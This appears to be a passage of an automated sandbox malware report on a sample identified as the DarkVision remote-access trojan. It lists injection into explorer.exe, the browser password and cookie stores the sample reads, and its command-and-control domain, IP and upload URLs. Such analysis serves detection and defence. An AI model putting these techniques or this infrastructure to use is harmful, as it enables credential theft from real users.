                    Source: 0.2.uncrypted.exe.3e07fa0.5.raw.unpack, RunPE.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Searches for specific processes (likely to inject)
                    Source: C:\Windows\explorer.exeCode function: 3_2_011943D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,3_2_011943D0
                    Source: C:\Windows\explorer.exeCode function: 3_2_011942E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,3_2_011942E0
                    Source: C:\Windows\explorer.exeCode function: 3_2_0119A3B0 setsockopt,SetEvent,LocalAlloc,wnsprintfW,LocalAlloc,lstrcpyW,LocalAlloc,lstrcpyW,CoInitializeEx,ShellExecuteExW,GetLastError,CoUninitialize,LocalAlloc,wnsprintfW,CreateProcessW,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,shutdown,closesocket,3_2_0119A3B0
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess created: C:\Users\user\Desktop\uncrypted.exe "C:\Users\user\Desktop\uncrypted.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                    Source: C:\Windows\explorer.exeCode function: 3_2_0119ECE0 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,3_2_0119ECE0
                    Source: C:\Windows\explorer.exeCode function: 3_2_0119ECE0 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,3_2_0119ECE0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: ___crtGetLocaleInfoEx,2_2_00420800
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: LocalAlloc,und_memcpy,CreateEventW,LocalFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,LocalFree,CloseHandle,CloseHandle,LocalFree,2_2_004208A0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: OpenEventW,OpenMutexW,OpenMutexW,WaitForSingleObject,CreateEventW,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,WaitForSingleObject,WaitForSingleObject,CreateEventW,LocalAlloc,CreateThread,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,___crtGetLocaleInfoEx,GetTickCount,___crtGetLocaleInfoEx,Sleep,SetEvent,WaitForSingleObject,CloseHandle,LocalFree,CloseHandle,CloseHandle,WaitForSingleObject,WaitForSingleObject,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,ReleaseMutex,CloseHandle,CloseHandle,CloseHandle,2_2_00422100
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: ___crtGetLocaleInfoEx,2_2_00418119
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: ___crtGetLocaleInfoEx,2_2_00418132
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: ___crtGetLocaleInfoEx,WaitForSingleObject,___crtGetLocaleInfoEx,WaitForSingleObject,WaitForSingleObject,CloseHandle,2_2_00421A20
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: LocalAlloc,und_memcpy,CreateEventW,wsprintfW,GetForegroundWindow,SetWindowTextW,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,LocalFree,CloseHandle,CloseHandle,LocalFree,2_2_00420AB0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: LocalAlloc,und_memcpy,CreateEventW,LocalFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,CloseHandle,LocalFree,2_2_00420CE0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,___crtGetLocaleInfoEx,2_2_00417D70
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: LocalAlloc,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,und_memcpy,LocalFree,LocalFree,2_2_004215C0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: ___crtGetLocaleInfoEx,WaitForSingleObject,___crtGetLocaleInfoEx,WaitForSingleObject,WaitForSingleObject,CloseHandle,2_2_00421DA0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: LocalAlloc,und_memcpy,CreateEventW,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,CloseHandle,LocalFree,2_2_00420EE0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: ___crtGetLocaleInfoEx,2_2_00420760
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: LocalAlloc,wsprintfA,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,und_memcpy,LocalFree,LocalFree,2_2_00421700
                    Source: C:\Users\user\Desktop\uncrypted.exeQueries volume information: C:\Users\user\Desktop\uncrypted.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_0042C41F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0042C41F
                    Source: C:\Windows\explorer.exeCode function: 3_2_011B5AD0 LocalAlloc,LoadLibraryW,LocalFree,GetProcAddress,LocalFree,RtlGetVersion,LocalFree,GetUserGeoID,gethostname,gethostbyname,GetComputerNameExW,GetUserNameW,GetTickCount64,LocalFree,3_2_011B5AD0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F3A564 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,4_2_00F3A564
                    Source: C:\Windows\explorer.exeCode function: 3_2_011BF6DC HeapCreate,GetVersion,HeapSetInformation,3_2_011BF6DC
                    Source: C:\Users\user\Desktop\uncrypted.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DarkVision Rat
                    Source: Yara matchFile source: 2.2.uncrypted.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.uncrypted.exe.11edea0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.uncrypted.exe.4081f90.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.uncrypted.exe.41021c0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.explorer.exe.1190000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.uncrypted.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2055171521.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2054936122.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: uncrypted.exe PID: 3856, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: uncrypted.exe PID: 2892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5060, type: MEMORYSTR
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\explorer.exeCode function: ENCWCHAR \Google\Chrome\User Data\Default\Login Data4_2_00E73FC0
                    Contains functionality to steal saved passwords of Firefox
                    Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword4_2_00E7ADF0
                    Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword4_2_00E7ADF0
                    Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword4_2_00E7ADF0
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\pkcs11.txtJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\pkcs11.txtJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior

                    Remote Access Functionality

                    barindex
                    Yara detected DarkVision Rat
                    Source: Yara matchFile source: 2.2.uncrypted.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.uncrypted.exe.11edea0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.uncrypted.exe.4081f90.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.uncrypted.exe.41021c0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.explorer.exe.1190000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.uncrypted.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2055171521.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2054936122.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: uncrypted.exe PID: 3856, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: uncrypted.exe PID: 2892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5060, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts23
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		2
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
                    Process Injection                    		3
                    Obfuscated Files or Information                    		2
                    Credentials In Files                    		2
                    File and Directory Discovery                    		SMB/Windows Admin Shares21
                    Input Capture                    		11
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                    Software Packing                    		NTDS125
                    System Information Discovery                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets131
                    Security Software Discovery                    		SSHKeylogging223
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials31
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Modify Registry                    		DCSync11
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    System Owner/User Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582630 Sample: uncrypted.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 27 jholo.duckdns.org 2->27 37 Suricata IDS alerts for network traffic 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 45 9 other signatures 2->45 9 uncrypted.exe 3 2->9         started        signatures3 43 Uses dynamic DNS services 27->43 process4 file5 23 C:\Users\user\AppData\...\uncrypted.exe.log, ASCII 9->23 dropped 51 Detected unpacking (changes PE section rights) 9->51 53 Detected unpacking (overwrites its own PE header) 9->53 55 Found evasive API chain (may stop execution after checking mutex) 9->55 57 Switches to a custom stack to bypass stack traces 9->57 13 uncrypted.exe 3 1 9->13         started        signatures6 process7 signatures8 59 Maps a DLL or memory area into another process 13->59 16 explorer.exe 1 13->16         started        process9 dnsIp10 25 jholo.duckdns.org 5.89.185.156, 49704, 49705, 49706 VODAFONE-IT-ASNIT Italy 16->25 29 Found evasive API chain (may stop execution after checking mutex) 16->29 31 Contains functionality to steal saved passwords of Firefox 16->31 33 Contains functionality to steal Chrome passwords or cookies 16->33 35 2 other signatures 16->35 20 explorer.exe 4 1 16->20         started        signatures11 process12 signatures13 47 System process connects to network (likely due to code injection or exploit) 20->47 49 Tries to harvest and steal browser information (history, passwords, etc) 20->49

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    uncrypted.exe61%VirustotalBrowse
                    uncrypted.exe61%ReversingLabsByteCode-MSIL.Trojan.Generic
                    uncrypted.exe100%AviraTR/Dropper.MSIL.Gen
                    uncrypted.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://jholo.duckdns.org:8181/upload.phporage0%Avira URL Cloudsafe
                    http://jholo.duckdns.org:8181/upload.phpy=part0%Avira URL Cloudsafe
                    http://jholo.duckdns.org:8181/llu0%Avira URL Cloudsafe
                    http://jholo.duckdns.org:8181/PASSWORDRECOVERY32EXE.EXEhttp://jholo.duckdns.org:8181/PASSWORDRECOVER0%Avira URL Cloudsafe
                    http://jholo.duckdns.org:8181/upload.phphic0%Avira URL Cloudsafe
                    http://jholo.duckdns.org:8181/upload.php0%Avira URL Cloudsafe
                    http://jholo.duckdns.org:8181/upload.phpcp=0%Avira URL Cloudsafe
                    http://jholo.duckdns.org/upload.php0%Avira URL Cloudsafe
                    http://jholo.duckdns.org:8181/n0%Avira URL Cloudsafe
                    http://jholo.duckdns.org:8181/0%Avira URL Cloudsafe
                    http://jholo.duckdns.org:8181/L0%Avira URL Cloudsafe
                    http://jholo.duckdns.org:8181/PASSWORDRECOVERY64EXE.EXE0%Avira URL Cloudsafe
                    jholo.duckdns.org0%Avira URL Cloudsafe
                    http://jholo.duckdns.org:8181/upload.php80%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    jholo.duckdns.org
                    		5.89.185.156
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://jholo.duckdns.org/upload.phptrue
                      • Avira URL Cloud: safe
                      		unknown
                      jholo.duckdns.orgtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://jholo.duckdns.org:8181/lluexplorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://jholo.duckdns.org:8181/upload.phpexplorer.exe, explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2084150348.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083994285.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2084578102.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2085034739.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2084841084.0000000000F58000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2085061884.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2084288266.0000000002DC9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://jholo.duckdns.org:8181/upload.phpy=partexplorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://jholo.duckdns.org:8181/nexplorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://jholo.duckdns.org:8181/upload.phphicexplorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://jholo.duckdns.org:8181/explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://jholo.duckdns.org:8181/upload.phporageexplorer.exe, 00000004.00000002.2084578102.0000000000C69000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://jholo.duckdns.org:8181/PASSWORDRECOVERY32EXE.EXEhttp://jholo.duckdns.org:8181/PASSWORDRECOVERuncrypted.exe, 00000000.00000002.2055171521.0000000003DBC000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000000.00000002.2055171521.0000000004175000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000000.00000002.2055171521.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000000.00000002.2055171521.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000002.00000002.2041122621.0000000000475000.00000040.00000400.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://jholo.duckdns.org:8181/upload.phpcp=explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://jholo.duckdns.org:8181/Lexplorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://jholo.duckdns.org:8181/PASSWORDRECOVERY64EXE.EXEexplorer.exe, explorer.exe, 00000003.00000003.2659390305.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291325405.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291451466.0000000000F84000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://jholo.duckdns.org:8181/lexplorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://jholo.duckdns.org:8181/upload.php8explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        5.89.185.156
                        		jholo.duckdns.orgItaly
                        		30722VODAFONE-IT-ASNITtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1582630
                        Start date and time:2024-12-31 07:32:08 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 33s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:7
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:uncrypted.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winEXE@7/2@3/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 67
                        • Number of non-executed functions: 327
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45, 172.202.163.200
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
